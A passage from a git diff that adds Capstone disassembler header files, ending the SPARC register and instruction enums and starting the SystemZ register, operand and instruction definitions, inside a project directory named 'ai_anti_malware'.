SPARC_REG_F19, + SPARC_REG_F20, + SPARC_REG_F21, + SPARC_REG_F22, + SPARC_REG_F23, + SPARC_REG_F24, + SPARC_REG_F25, + SPARC_REG_F26, + SPARC_REG_F27, + SPARC_REG_F28, + SPARC_REG_F29, + SPARC_REG_F30, + SPARC_REG_F31, + SPARC_REG_F32, + SPARC_REG_F34, + SPARC_REG_F36, + SPARC_REG_F38, + SPARC_REG_F40, + SPARC_REG_F42, + SPARC_REG_F44, + SPARC_REG_F46, + SPARC_REG_F48, + SPARC_REG_F50, + SPARC_REG_F52, + SPARC_REG_F54, + SPARC_REG_F56, + SPARC_REG_F58, + SPARC_REG_F60, + SPARC_REG_F62, + SPARC_REG_FCC0, // Floating condition codes + SPARC_REG_FCC1, + SPARC_REG_FCC2, + SPARC_REG_FCC3, + SPARC_REG_FP, + SPARC_REG_G0, + SPARC_REG_G1, + SPARC_REG_G2, + SPARC_REG_G3, + SPARC_REG_G4, + SPARC_REG_G5, + SPARC_REG_G6, + SPARC_REG_G7, + SPARC_REG_I0, + SPARC_REG_I1, + SPARC_REG_I2, + SPARC_REG_I3, + SPARC_REG_I4, + SPARC_REG_I5, + SPARC_REG_I7, + SPARC_REG_ICC, // Integer condition codes + SPARC_REG_L0, + SPARC_REG_L1, + SPARC_REG_L2, + SPARC_REG_L3, + SPARC_REG_L4, + SPARC_REG_L5, + SPARC_REG_L6, + SPARC_REG_L7, + SPARC_REG_O0, + SPARC_REG_O1, + SPARC_REG_O2, + SPARC_REG_O3, + SPARC_REG_O4, + SPARC_REG_O5, + SPARC_REG_O7, + SPARC_REG_SP, + SPARC_REG_Y, + + // special register + SPARC_REG_XCC, + + SPARC_REG_ENDING, // <-- mark the end of the list of registers + + // extras + SPARC_REG_O6 = SPARC_REG_SP, + SPARC_REG_I6 = SPARC_REG_FP, +} sparc_reg; + +/// Instruction's operand referring to memory +/// This is associated with SPARC_OP_MEM operand type above +typedef struct sparc_op_mem { + uint8_t base; ///< base register, can be safely interpreted as + ///< a value of type `sparc_reg`, but it is only + ///< one byte wide + uint8_t index; ///< index register, same conditions apply here + int32_t disp; ///< displacement/offset value +} sparc_op_mem; + +/// Instruction operand +typedef struct cs_sparc_op { + sparc_op_type type; ///< operand type + union { + sparc_reg reg; ///< register value for REG operand + int64_t imm; ///< immediate value for IMM operand + sparc_op_mem mem; ///< base/disp value for MEM operand + }; +} cs_sparc_op; + +/// Instruction structure +typedef struct cs_sparc { + sparc_cc cc; ///< code condition for this insn + sparc_hint hint; ///< branch hint: encoding as bitwise OR of sparc_hint. + /// Number of operands of this instruction, + /// or 0 when instruction has no operand. + uint8_t op_count; + cs_sparc_op operands[4]; ///< operands for this instruction. +} cs_sparc; + +/// SPARC instruction +typedef enum sparc_insn { + SPARC_INS_INVALID = 0, + + SPARC_INS_ADDCC, + SPARC_INS_ADDX, + SPARC_INS_ADDXCC, + SPARC_INS_ADDXC, + SPARC_INS_ADDXCCC, + SPARC_INS_ADD, + SPARC_INS_ALIGNADDR, + SPARC_INS_ALIGNADDRL, + SPARC_INS_ANDCC, + SPARC_INS_ANDNCC, + SPARC_INS_ANDN, + SPARC_INS_AND, + SPARC_INS_ARRAY16, + SPARC_INS_ARRAY32, + SPARC_INS_ARRAY8, + SPARC_INS_B, + SPARC_INS_JMP, + SPARC_INS_BMASK, + SPARC_INS_FB, + SPARC_INS_BRGEZ, + SPARC_INS_BRGZ, + SPARC_INS_BRLEZ, + SPARC_INS_BRLZ, + SPARC_INS_BRNZ, + SPARC_INS_BRZ, + SPARC_INS_BSHUFFLE, + SPARC_INS_CALL, + SPARC_INS_CASX, + SPARC_INS_CAS, + SPARC_INS_CMASK16, + SPARC_INS_CMASK32, + SPARC_INS_CMASK8, + SPARC_INS_CMP, + SPARC_INS_EDGE16, + SPARC_INS_EDGE16L, + SPARC_INS_EDGE16LN, + SPARC_INS_EDGE16N, + SPARC_INS_EDGE32, + SPARC_INS_EDGE32L, + SPARC_INS_EDGE32LN, + SPARC_INS_EDGE32N, + SPARC_INS_EDGE8, + SPARC_INS_EDGE8L, + SPARC_INS_EDGE8LN, + SPARC_INS_EDGE8N, + SPARC_INS_FABSD, + SPARC_INS_FABSQ, + SPARC_INS_FABSS, + SPARC_INS_FADDD, + SPARC_INS_FADDQ, + SPARC_INS_FADDS, + SPARC_INS_FALIGNDATA, + SPARC_INS_FAND, + SPARC_INS_FANDNOT1, + SPARC_INS_FANDNOT1S, + SPARC_INS_FANDNOT2, + SPARC_INS_FANDNOT2S, + SPARC_INS_FANDS, + SPARC_INS_FCHKSM16, + SPARC_INS_FCMPD, + SPARC_INS_FCMPEQ16, + SPARC_INS_FCMPEQ32, + SPARC_INS_FCMPGT16, + SPARC_INS_FCMPGT32, + SPARC_INS_FCMPLE16, + SPARC_INS_FCMPLE32, + SPARC_INS_FCMPNE16, + SPARC_INS_FCMPNE32, + SPARC_INS_FCMPQ, + SPARC_INS_FCMPS, + SPARC_INS_FDIVD, + SPARC_INS_FDIVQ, + SPARC_INS_FDIVS, + SPARC_INS_FDMULQ, + SPARC_INS_FDTOI, + SPARC_INS_FDTOQ, + SPARC_INS_FDTOS, + SPARC_INS_FDTOX, + SPARC_INS_FEXPAND, + SPARC_INS_FHADDD, + SPARC_INS_FHADDS, + SPARC_INS_FHSUBD, + SPARC_INS_FHSUBS, + SPARC_INS_FITOD, + SPARC_INS_FITOQ, + SPARC_INS_FITOS, + SPARC_INS_FLCMPD, + SPARC_INS_FLCMPS, + SPARC_INS_FLUSHW, + SPARC_INS_FMEAN16, + SPARC_INS_FMOVD, + SPARC_INS_FMOVQ, + SPARC_INS_FMOVRDGEZ, + SPARC_INS_FMOVRQGEZ, + SPARC_INS_FMOVRSGEZ, + SPARC_INS_FMOVRDGZ, + SPARC_INS_FMOVRQGZ, + SPARC_INS_FMOVRSGZ, + SPARC_INS_FMOVRDLEZ, + SPARC_INS_FMOVRQLEZ, + SPARC_INS_FMOVRSLEZ, + SPARC_INS_FMOVRDLZ, + SPARC_INS_FMOVRQLZ, + SPARC_INS_FMOVRSLZ, + SPARC_INS_FMOVRDNZ, + SPARC_INS_FMOVRQNZ, + SPARC_INS_FMOVRSNZ, + SPARC_INS_FMOVRDZ, + SPARC_INS_FMOVRQZ, + SPARC_INS_FMOVRSZ, + SPARC_INS_FMOVS, + SPARC_INS_FMUL8SUX16, + SPARC_INS_FMUL8ULX16, + SPARC_INS_FMUL8X16, + SPARC_INS_FMUL8X16AL, + SPARC_INS_FMUL8X16AU, + SPARC_INS_FMULD, + SPARC_INS_FMULD8SUX16, + SPARC_INS_FMULD8ULX16, + SPARC_INS_FMULQ, + SPARC_INS_FMULS, + SPARC_INS_FNADDD, + SPARC_INS_FNADDS, + SPARC_INS_FNAND, + SPARC_INS_FNANDS, + SPARC_INS_FNEGD, + SPARC_INS_FNEGQ, + SPARC_INS_FNEGS, + SPARC_INS_FNHADDD, + SPARC_INS_FNHADDS, + SPARC_INS_FNOR, + SPARC_INS_FNORS, + SPARC_INS_FNOT1, + SPARC_INS_FNOT1S, + SPARC_INS_FNOT2, + SPARC_INS_FNOT2S, + SPARC_INS_FONE, + SPARC_INS_FONES, + SPARC_INS_FOR, + SPARC_INS_FORNOT1, + SPARC_INS_FORNOT1S, + SPARC_INS_FORNOT2, + SPARC_INS_FORNOT2S, + SPARC_INS_FORS, + SPARC_INS_FPACK16, + SPARC_INS_FPACK32, + SPARC_INS_FPACKFIX, + SPARC_INS_FPADD16, + SPARC_INS_FPADD16S, + SPARC_INS_FPADD32, + SPARC_INS_FPADD32S, + SPARC_INS_FPADD64, + SPARC_INS_FPMERGE, + SPARC_INS_FPSUB16, + SPARC_INS_FPSUB16S, + SPARC_INS_FPSUB32, + SPARC_INS_FPSUB32S, + SPARC_INS_FQTOD, + SPARC_INS_FQTOI, + SPARC_INS_FQTOS, + SPARC_INS_FQTOX, + SPARC_INS_FSLAS16, + SPARC_INS_FSLAS32, + SPARC_INS_FSLL16, + SPARC_INS_FSLL32, + SPARC_INS_FSMULD, + SPARC_INS_FSQRTD, + SPARC_INS_FSQRTQ, + SPARC_INS_FSQRTS, + SPARC_INS_FSRA16, + SPARC_INS_FSRA32, + SPARC_INS_FSRC1, + SPARC_INS_FSRC1S, + SPARC_INS_FSRC2, + SPARC_INS_FSRC2S, + SPARC_INS_FSRL16, + SPARC_INS_FSRL32, + SPARC_INS_FSTOD, + SPARC_INS_FSTOI, + SPARC_INS_FSTOQ, + SPARC_INS_FSTOX, + SPARC_INS_FSUBD, + SPARC_INS_FSUBQ, + SPARC_INS_FSUBS, + SPARC_INS_FXNOR, + SPARC_INS_FXNORS, + SPARC_INS_FXOR, + SPARC_INS_FXORS, + SPARC_INS_FXTOD, + SPARC_INS_FXTOQ, + SPARC_INS_FXTOS, + SPARC_INS_FZERO, + SPARC_INS_FZEROS, + SPARC_INS_JMPL, + SPARC_INS_LDD, + SPARC_INS_LD, + SPARC_INS_LDQ, + SPARC_INS_LDSB, + SPARC_INS_LDSH, + SPARC_INS_LDSW, + SPARC_INS_LDUB, + SPARC_INS_LDUH, + SPARC_INS_LDX, + SPARC_INS_LZCNT, + SPARC_INS_MEMBAR, + SPARC_INS_MOVDTOX, + SPARC_INS_MOV, + SPARC_INS_MOVRGEZ, + SPARC_INS_MOVRGZ, + SPARC_INS_MOVRLEZ, + SPARC_INS_MOVRLZ, + SPARC_INS_MOVRNZ, + SPARC_INS_MOVRZ, + SPARC_INS_MOVSTOSW, + SPARC_INS_MOVSTOUW, + SPARC_INS_MULX, + SPARC_INS_NOP, + SPARC_INS_ORCC, + SPARC_INS_ORNCC, + SPARC_INS_ORN, + SPARC_INS_OR, + SPARC_INS_PDIST, + SPARC_INS_PDISTN, + SPARC_INS_POPC, + SPARC_INS_RD, + SPARC_INS_RESTORE, + SPARC_INS_RETT, + SPARC_INS_SAVE, + SPARC_INS_SDIVCC, + SPARC_INS_SDIVX, + SPARC_INS_SDIV, + SPARC_INS_SETHI, + SPARC_INS_SHUTDOWN, + SPARC_INS_SIAM, + SPARC_INS_SLLX, + SPARC_INS_SLL, + SPARC_INS_SMULCC, + SPARC_INS_SMUL, + SPARC_INS_SRAX, + SPARC_INS_SRA, + SPARC_INS_SRLX, + SPARC_INS_SRL, + SPARC_INS_STBAR, + SPARC_INS_STB, + SPARC_INS_STD, + SPARC_INS_ST, + SPARC_INS_STH, + SPARC_INS_STQ, + SPARC_INS_STX, + SPARC_INS_SUBCC, + SPARC_INS_SUBX, + SPARC_INS_SUBXCC, + SPARC_INS_SUB, + SPARC_INS_SWAP, + SPARC_INS_TADDCCTV, + SPARC_INS_TADDCC, + SPARC_INS_T, + SPARC_INS_TSUBCCTV, + SPARC_INS_TSUBCC, + SPARC_INS_UDIVCC, + SPARC_INS_UDIVX, + SPARC_INS_UDIV, + SPARC_INS_UMULCC, + SPARC_INS_UMULXHI, + SPARC_INS_UMUL, + SPARC_INS_UNIMP, + SPARC_INS_FCMPED, + SPARC_INS_FCMPEQ, + SPARC_INS_FCMPES, + SPARC_INS_WR, + SPARC_INS_XMULX, + SPARC_INS_XMULXHI, + SPARC_INS_XNORCC, + SPARC_INS_XNOR, + SPARC_INS_XORCC, + SPARC_INS_XOR, + + // alias instructions + SPARC_INS_RET, + SPARC_INS_RETL, + + SPARC_INS_ENDING, // <-- mark the end of the list of instructions +} sparc_insn; + +/// Group of SPARC instructions +typedef enum sparc_insn_group { + SPARC_GRP_INVALID = 0, ///< = CS_GRP_INVALID + + // Generic groups + // all jump instructions (conditional+direct+indirect jumps) + SPARC_GRP_JUMP, ///< = CS_GRP_JUMP + + // Architecture-specific groups + SPARC_GRP_HARDQUAD = 128, + SPARC_GRP_V9, + SPARC_GRP_VIS, + SPARC_GRP_VIS2, + SPARC_GRP_VIS3, + SPARC_GRP_32BIT, + SPARC_GRP_64BIT, + + SPARC_GRP_ENDING, // <-- mark the end of the list of groups +} sparc_insn_group; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/capstone/include/capstone/systemz.h b/ai_anti_malware/capstone/include/capstone/systemz.h new file mode 100644 index 0000000..aa9768c --- /dev/null +++ b/ai_anti_malware/capstone/include/capstone/systemz.h @@ -0,0 +1,830 @@ +#ifndef CAPSTONE_SYSTEMZ_H +#define CAPSTONE_SYSTEMZ_H + +/* Capstone Disassembly Engine */ +/* By Nguyen Anh Quynh , 2014-2015 */ + +#ifdef __cplusplus +extern "C" { +#endif + +#include "platform.h" + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +/// Enums corresponding to SystemZ condition codes +typedef enum sysz_cc { + SYSZ_CC_INVALID = 0, ///< invalid CC (default) + + SYSZ_CC_O, + SYSZ_CC_H, + SYSZ_CC_NLE, + SYSZ_CC_L, + SYSZ_CC_NHE, + SYSZ_CC_LH, + SYSZ_CC_NE, + SYSZ_CC_E, + SYSZ_CC_NLH, + SYSZ_CC_HE, + SYSZ_CC_NL, + SYSZ_CC_LE, + SYSZ_CC_NH, + SYSZ_CC_NO, +} sysz_cc; + +/// Operand type for instruction's operands +typedef enum sysz_op_type { + SYSZ_OP_INVALID = 0, ///< = CS_OP_INVALID (Uninitialized). + SYSZ_OP_REG, ///< = CS_OP_REG (Register operand). + SYSZ_OP_IMM, ///< = CS_OP_IMM (Immediate operand). + SYSZ_OP_MEM, ///< = CS_OP_MEM (Memory operand). + SYSZ_OP_ACREG = 64, ///< Access register operand. +} sysz_op_type; + +/// SystemZ registers +typedef enum sysz_reg { + SYSZ_REG_INVALID = 0, + + SYSZ_REG_0, + SYSZ_REG_1, + SYSZ_REG_2, + SYSZ_REG_3, + SYSZ_REG_4, + SYSZ_REG_5, + SYSZ_REG_6, + SYSZ_REG_7, + SYSZ_REG_8, + SYSZ_REG_9, + SYSZ_REG_10, + SYSZ_REG_11, + SYSZ_REG_12, + SYSZ_REG_13, + SYSZ_REG_14, + SYSZ_REG_15, + SYSZ_REG_CC, + SYSZ_REG_F0, + SYSZ_REG_F1, + SYSZ_REG_F2, + SYSZ_REG_F3, + SYSZ_REG_F4, + SYSZ_REG_F5, + SYSZ_REG_F6, + SYSZ_REG_F7, + SYSZ_REG_F8, + SYSZ_REG_F9, + SYSZ_REG_F10, + SYSZ_REG_F11, + SYSZ_REG_F12, + SYSZ_REG_F13, + SYSZ_REG_F14, + SYSZ_REG_F15, + + SYSZ_REG_R0L, + + SYSZ_REG_ENDING, +} sysz_reg; + +/// Instruction's operand referring to memory +/// This is associated with SYSZ_OP_MEM operand type above +typedef struct sysz_op_mem { + uint8_t base; ///< base register, can be safely interpreted as + ///< a value of type `sysz_reg`, but it is only + ///< one byte wide + uint8_t index; ///< index register, same conditions apply here + uint64_t length; ///< BDLAddr operand + int64_t disp; ///< displacement/offset value +} sysz_op_mem; + +/// Instruction operand +typedef struct cs_sysz_op { + sysz_op_type type; ///< operand type + union { + sysz_reg reg; ///< register value for REG operand + int64_t imm; ///< immediate value for IMM operand + sysz_op_mem mem; ///< base/disp value for MEM operand + }; +} cs_sysz_op; + +// Instruction structure +typedef struct cs_sysz { + sysz_cc cc; ///< Code condition + /// Number of operands of this instruction, + /// or 0 when instruction has no operand. + uint8_t op_count; + cs_sysz_op operands[6]; ///< operands for this instruction. +} cs_sysz; + +/// SystemZ instruction +typedef enum sysz_insn { + SYSZ_INS_INVALID = 0, + + SYSZ_INS_A, + SYSZ_INS_ADB, + SYSZ_INS_ADBR, + SYSZ_INS_AEB, + SYSZ_INS_AEBR, + SYSZ_INS_AFI, + SYSZ_INS_AG, + SYSZ_INS_AGF, + SYSZ_INS_AGFI, + SYSZ_INS_AGFR, + SYSZ_INS_AGHI, + SYSZ_INS_AGHIK, + SYSZ_INS_AGR, + SYSZ_INS_AGRK, + SYSZ_INS_AGSI, + SYSZ_INS_AH, + SYSZ_INS_AHI, + SYSZ_INS_AHIK, + SYSZ_INS_AHY, + SYSZ_INS_AIH, + SYSZ_INS_AL, + SYSZ_INS_ALC, + SYSZ_INS_ALCG, + SYSZ_INS_ALCGR, + SYSZ_INS_ALCR, + SYSZ_INS_ALFI, + SYSZ_INS_ALG, + SYSZ_INS_ALGF, + SYSZ_INS_ALGFI, + SYSZ_INS_ALGFR, + SYSZ_INS_ALGHSIK, + SYSZ_INS_ALGR, + SYSZ_INS_ALGRK, + SYSZ_INS_ALHSIK, + SYSZ_INS_ALR, + SYSZ_INS_ALRK, + SYSZ_INS_ALY, + SYSZ_INS_AR, + SYSZ_INS_ARK, + SYSZ_INS_ASI, + SYSZ_INS_AXBR, + SYSZ_INS_AY, + SYSZ_INS_BCR, + SYSZ_INS_BRC, + SYSZ_INS_BRCL, + SYSZ_INS_CGIJ, + SYSZ_INS_CGRJ, + SYSZ_INS_CIJ, + SYSZ_INS_CLGIJ, + SYSZ_INS_CLGRJ, + SYSZ_INS_CLIJ, + SYSZ_INS_CLRJ, + SYSZ_INS_CRJ, + SYSZ_INS_BER, + SYSZ_INS_JE, + SYSZ_INS_JGE, + SYSZ_INS_LOCE, + SYSZ_INS_LOCGE, + SYSZ_INS_LOCGRE, + SYSZ_INS_LOCRE, + SYSZ_INS_STOCE, + SYSZ_INS_STOCGE, + SYSZ_INS_BHR, + SYSZ_INS_BHER, + SYSZ_INS_JHE, + SYSZ_INS_JGHE, + SYSZ_INS_LOCHE, + SYSZ_INS_LOCGHE, + SYSZ_INS_LOCGRHE, + SYSZ_INS_LOCRHE, + SYSZ_INS_STOCHE, + SYSZ_INS_STOCGHE, + SYSZ_INS_JH, + SYSZ_INS_JGH, + SYSZ_INS_LOCH, + SYSZ_INS_LOCGH, + SYSZ_INS_LOCGRH, + SYSZ_INS_LOCRH, + SYSZ_INS_STOCH, + SYSZ_INS_STOCGH, + SYSZ_INS_CGIJNLH, + SYSZ_INS_CGRJNLH, + SYSZ_INS_CIJNLH, + SYSZ_INS_CLGIJNLH, + SYSZ_INS_CLGRJNLH, + SYSZ_INS_CLIJNLH, + SYSZ_INS_CLRJNLH, + SYSZ_INS_CRJNLH, + SYSZ_INS_CGIJE, + SYSZ_INS_CGRJE, + SYSZ_INS_CIJE, + SYSZ_INS_CLGIJE, + SYSZ_INS_CLGRJE, + SYSZ_INS_CLIJE, + SYSZ_INS_CLRJE, + SYSZ_INS_CRJE, + SYSZ_INS_CGIJNLE, + SYSZ_INS_CGRJNLE, + SYSZ_INS_CIJNLE, + SYSZ_INS_CLGIJNLE, + SYSZ_INS_CLGRJNLE, + SYSZ_INS_CLIJNLE, + SYSZ_INS_CLRJNLE, + SYSZ_INS_CRJNLE, + SYSZ_INS_CGIJH, + SYSZ_INS_CGRJH, + SYSZ_INS_CIJH, + SYSZ_INS_CLGIJH, + SYSZ_INS_CLGRJH, + SYSZ_INS_CLIJH, + SYSZ_INS_CLRJH, + SYSZ_INS_CRJH, + SYSZ_INS_CGIJNL, + SYSZ_INS_CGRJNL, + SYSZ_INS_CIJNL, + SYSZ_INS_CLGIJNL, + SYSZ_INS_CLGRJNL, + SYSZ_INS_CLIJNL, + SYSZ_INS_CLRJNL, + SYSZ_INS_CRJNL, + SYSZ_INS_CGIJHE, + SYSZ_INS_CGRJHE, + SYSZ_INS_CIJHE, + SYSZ_INS_CLGIJHE, + SYSZ_INS_CLGRJHE, + SYSZ_INS_CLIJHE, + SYSZ_INS_CLRJHE, + SYSZ_INS_CRJHE, + SYSZ_INS_CGIJNHE, + SYSZ_INS_CGRJNHE, + SYSZ_INS_CIJNHE, + SYSZ_INS_CLGIJNHE, + SYSZ_INS_CLGRJNHE, + SYSZ_INS_CLIJNHE, + SYSZ_INS_CLRJNHE, + SYSZ_INS_CRJNHE, + SYSZ_INS_CGIJL, + SYSZ_INS_CGRJL, + SYSZ_INS_CIJL, + SYSZ_INS_CLGIJL, + SYSZ_INS_CLGRJL, + SYSZ_INS_CLIJL, + SYSZ_INS_CLRJL, + SYSZ_INS_CRJL, + SYSZ_INS_CGIJNH, + SYSZ_INS_CGRJNH, + SYSZ_INS_CIJNH, + SYSZ_INS_CLGIJNH, + SYSZ_INS_CLGRJNH, + SYSZ_INS_CLIJNH, + SYSZ_INS_CLRJNH, + SYSZ_INS_CRJNH, + SYSZ_INS_CGIJLE, + SYSZ_INS_CGRJLE, + SYSZ_INS_CIJLE, + SYSZ_INS_CLGIJLE, + SYSZ_INS_CLGRJLE, + SYSZ_INS_CLIJLE, + SYSZ_INS_CLRJLE, + SYSZ_INS_CRJLE, + SYSZ_INS_CGIJNE, + SYSZ_INS_CGRJNE, + SYSZ_INS_CIJNE, + SYSZ_INS_CLGIJNE, + SYSZ_INS_CLGRJNE, + SYSZ_INS_CLIJNE, + SYSZ_INS_CLRJNE, + SYSZ_INS_CRJNE, + SYSZ_INS_CGIJLH, + SYSZ_INS_CGRJLH, + SYSZ_INS_CIJLH, + SYSZ_INS_CLGIJLH, + SYSZ_INS_CLGRJLH, + SYSZ_INS_CLIJLH, + SYSZ_INS_CLRJLH, + SYSZ_INS_CRJLH, + SYSZ_INS_BLR, + SYSZ_INS_BLER, + SYSZ_INS_JLE, + SYSZ_INS_JGLE, + SYSZ_INS_LOCLE, + SYSZ_INS_LOCGLE, + SYSZ_INS_LOCGRLE, + SYSZ_INS_LOCRLE, + SYSZ_INS_STOCLE, + SYSZ_INS_STOCGLE, + SYSZ_INS_BLHR, + SYSZ_INS_JLH, + SYSZ_INS_JGLH, + SYSZ_INS_LOCLH, + SYSZ_INS_LOCGLH, + SYSZ_INS_LOCGRLH, + SYSZ_INS_LOCRLH, + SYSZ_INS_STOCLH, + SYSZ_INS_STOCGLH, + SYSZ_INS_JL, + SYSZ_INS_JGL, + SYSZ_INS_LOCL, + SYSZ_INS_LOCGL, + SYSZ_INS_LOCGRL, + SYSZ_INS_LOCRL, + SYSZ_INS_LOC, + SYSZ_INS_LOCG, + SYSZ_INS_LOCGR, + SYSZ_INS_LOCR, + SYSZ_INS_STOCL, + SYSZ_INS_STOCGL, + SYSZ_INS_BNER, + SYSZ_INS_JNE, + SYSZ_INS_JGNE, + SYSZ_INS_LOCNE, + SYSZ_INS_LOCGNE, + SYSZ_INS_LOCGRNE, + SYSZ_INS_LOCRNE, + SYSZ_INS_STOCNE, + SYSZ_INS_STOCGNE, + SYSZ_INS_BNHR, + SYSZ_INS_BNHER, + SYSZ_INS_JNHE, + SYSZ_INS_JGNHE, + SYSZ_INS_LOCNHE, + SYSZ_INS_LOCGNHE, + SYSZ_INS_LOCGRNHE, + SYSZ_INS_LOCRNHE, + SYSZ_INS_STOCNHE, + SYSZ_INS_STOCGNHE, + SYSZ_INS_JNH, + SYSZ_INS_JGNH, + SYSZ_INS_LOCNH, + SYSZ_INS_LOCGNH, + SYSZ_INS_LOCGRNH, + SYSZ_INS_LOCRNH, + SYSZ_INS_STOCNH, + SYSZ_INS_STOCGNH, + SYSZ_INS_BNLR, + SYSZ_INS_BNLER, + SYSZ_INS_JNLE, + SYSZ_INS_JGNLE, + SYSZ_INS_LOCNLE, + SYSZ_INS_LOCGNLE, + SYSZ_INS_LOCGRNLE, + SYSZ_INS_LOCRNLE, + SYSZ_INS_STOCNLE, + SYSZ_INS_STOCGNLE, + SYSZ_INS_BNLHR, + SYSZ_INS_JNLH, + SYSZ_INS_JGNLH, + SYSZ_INS_LOCNLH, + SYSZ_INS_LOCGNLH, + SYSZ_INS_LOCGRNLH, + SYSZ_INS_LOCRNLH, + SYSZ_INS_STOCNLH, + SYSZ_INS_STOCGNLH, + SYSZ_INS_JNL, + SYSZ_INS_JGNL, + SYSZ_INS_LOCNL, + SYSZ_INS_LOCGNL, + SYSZ_INS_LOCGRNL, + SYSZ_INS_LOCRNL, + SYSZ_INS_STOCNL, + SYSZ_INS_STOCGNL, + SYSZ_INS_BNOR, + SYSZ_INS_JNO, + SYSZ_INS_JGNO, + SYSZ_INS_LOCNO, + SYSZ_INS_LOCGNO, + SYSZ_INS_LOCGRNO, + SYSZ_INS_LOCRNO, + SYSZ_INS_STOCNO, + SYSZ_INS_STOCGNO, + SYSZ_INS_BOR, + SYSZ_INS_JO, + SYSZ_INS_JGO, + SYSZ_INS_LOCO, + SYSZ_INS_LOCGO, + SYSZ_INS_LOCGRO, + SYSZ_INS_LOCRO, + SYSZ_INS_STOCO, + SYSZ_INS_STOCGO, + SYSZ_INS_STOC, + SYSZ_INS_STOCG, + SYSZ_INS_BASR, + SYSZ_INS_BR, + SYSZ_INS_BRAS, + SYSZ_INS_BRASL, + SYSZ_INS_J, + SYSZ_INS_JG, + SYSZ_INS_BRCT, + SYSZ_INS_BRCTG, + SYSZ_INS_C, + SYSZ_INS_CDB, + SYSZ_INS_CDBR, + SYSZ_INS_CDFBR, + SYSZ_INS_CDGBR, + SYSZ_INS_CDLFBR, + SYSZ_INS_CDLGBR, + SYSZ_INS_CEB, + SYSZ_INS_CEBR, + SYSZ_INS_CEFBR, + SYSZ_INS_CEGBR, + SYSZ_INS_CELFBR, + SYSZ_INS_CELGBR, + SYSZ_INS_CFDBR, + SYSZ_INS_CFEBR, + SYSZ_INS_CFI, + SYSZ_INS_CFXBR, + SYSZ_INS_CG, + SYSZ_INS_CGDBR, + SYSZ_INS_CGEBR, + SYSZ_INS_CGF, + SYSZ_INS_CGFI, + SYSZ_INS_CGFR, + SYSZ_INS_CGFRL, + SYSZ_INS_CGH, + SYSZ_INS_CGHI, + SYSZ_INS_CGHRL, + SYSZ_INS_CGHSI, + SYSZ_INS_CGR, + SYSZ_INS_CGRL, + SYSZ_INS_CGXBR, + SYSZ_INS_CH, + SYSZ_INS_CHF, + SYSZ_INS_CHHSI, + SYSZ_INS_CHI, + SYSZ_INS_CHRL, + SYSZ_INS_CHSI, + SYSZ_INS_CHY, + SYSZ_INS_CIH, + SYSZ_INS_CL, + SYSZ_INS_CLC, + SYSZ_INS_CLFDBR, + SYSZ_INS_CLFEBR, + SYSZ_INS_CLFHSI, + SYSZ_INS_CLFI, + SYSZ_INS_CLFXBR, + SYSZ_INS_CLG, + SYSZ_INS_CLGDBR, + SYSZ_INS_CLGEBR, + SYSZ_INS_CLGF, + SYSZ_INS_CLGFI, + SYSZ_INS_CLGFR, + SYSZ_INS_CLGFRL, + SYSZ_INS_CLGHRL, + SYSZ_INS_CLGHSI, + SYSZ_INS_CLGR, + SYSZ_INS_CLGRL, + SYSZ_INS_CLGXBR, + SYSZ_INS_CLHF, + SYSZ_INS_CLHHSI, + SYSZ_INS_CLHRL, + SYSZ_INS_CLI, + SYSZ_INS_CLIH, + SYSZ_INS_CLIY, + SYSZ_INS_CLR, + SYSZ_INS_CLRL, + SYSZ_INS_CLST, + SYSZ_INS_CLY, + SYSZ_INS_CPSDR, + SYSZ_INS_CR, + SYSZ_INS_CRL, + SYSZ_INS_CS, + SYSZ_INS_CSG, + SYSZ_INS_CSY, + SYSZ_INS_CXBR, + SYSZ_INS_CXFBR, + SYSZ_INS_CXGBR, + SYSZ_INS_CXLFBR, + SYSZ_INS_CXLGBR, + SYSZ_INS_CY, + SYSZ_INS_DDB, + SYSZ_INS_DDBR, + SYSZ_INS_DEB, + SYSZ_INS_DEBR, + SYSZ_INS_DL, + SYSZ_INS_DLG, + SYSZ_INS_DLGR, + SYSZ_INS_DLR, + SYSZ_INS_DSG, + SYSZ_INS_DSGF, + SYSZ_INS_DSGFR, + SYSZ_INS_DSGR, + SYSZ_INS_DXBR, + SYSZ_INS_EAR, + SYSZ_INS_FIDBR, + SYSZ_INS_FIDBRA, + SYSZ_INS_FIEBR, + SYSZ_INS_FIEBRA, + SYSZ_INS_FIXBR, + SYSZ_INS_FIXBRA, + SYSZ_INS_FLOGR, + SYSZ_INS_IC, + SYSZ_INS_ICY, + SYSZ_INS_IIHF, + SYSZ_INS_IIHH, + SYSZ_INS_IIHL, + SYSZ_INS_IILF, + SYSZ_INS_IILH, + SYSZ_INS_IILL, + SYSZ_INS_IPM, + SYSZ_INS_L, + SYSZ_INS_LA, + SYSZ_INS_LAA, + SYSZ_INS_LAAG, + SYSZ_INS_LAAL, + SYSZ_INS_LAALG, + SYSZ_INS_LAN, + SYSZ_INS_LANG, + SYSZ_INS_LAO, + SYSZ_INS_LAOG, + SYSZ_INS_LARL, + SYSZ_INS_LAX, + SYSZ_INS_LAXG, + SYSZ_INS_LAY, + SYSZ_INS_LB, + SYSZ_INS_LBH, + SYSZ_INS_LBR, + SYSZ_INS_LCDBR, + SYSZ_INS_LCEBR, + SYSZ_INS_LCGFR, + SYSZ_INS_LCGR, + SYSZ_INS_LCR, + SYSZ_INS_LCXBR, + SYSZ_INS_LD, + SYSZ_INS_LDEB, + SYSZ_INS_LDEBR, + SYSZ_INS_LDGR, + SYSZ_INS_LDR, + SYSZ_INS_LDXBR, + SYSZ_INS_LDXBRA, + SYSZ_INS_LDY, + SYSZ_INS_LE, + SYSZ_INS_LEDBR, + SYSZ_INS_LEDBRA, + SYSZ_INS_LER, + SYSZ_INS_LEXBR, + SYSZ_INS_LEXBRA, + SYSZ_INS_LEY, + SYSZ_INS_LFH, + SYSZ_INS_LG, + SYSZ_INS_LGB, + SYSZ_INS_LGBR, + SYSZ_INS_LGDR, + SYSZ_INS_LGF, + SYSZ_INS_LGFI, + SYSZ_INS_LGFR, + SYSZ_INS_LGFRL, + SYSZ_INS_LGH, + SYSZ_INS_LGHI, + SYSZ_INS_LGHR, + SYSZ_INS_LGHRL, + SYSZ_INS_LGR, + SYSZ_INS_LGRL, + SYSZ_INS_LH, + SYSZ_INS_LHH, + SYSZ_INS_LHI, + SYSZ_INS_LHR, + SYSZ_INS_LHRL, + SYSZ_INS_LHY, + SYSZ_INS_LLC, + SYSZ_INS_LLCH, + SYSZ_INS_LLCR, + SYSZ_INS_LLGC, + SYSZ_INS_LLGCR, + SYSZ_INS_LLGF, + 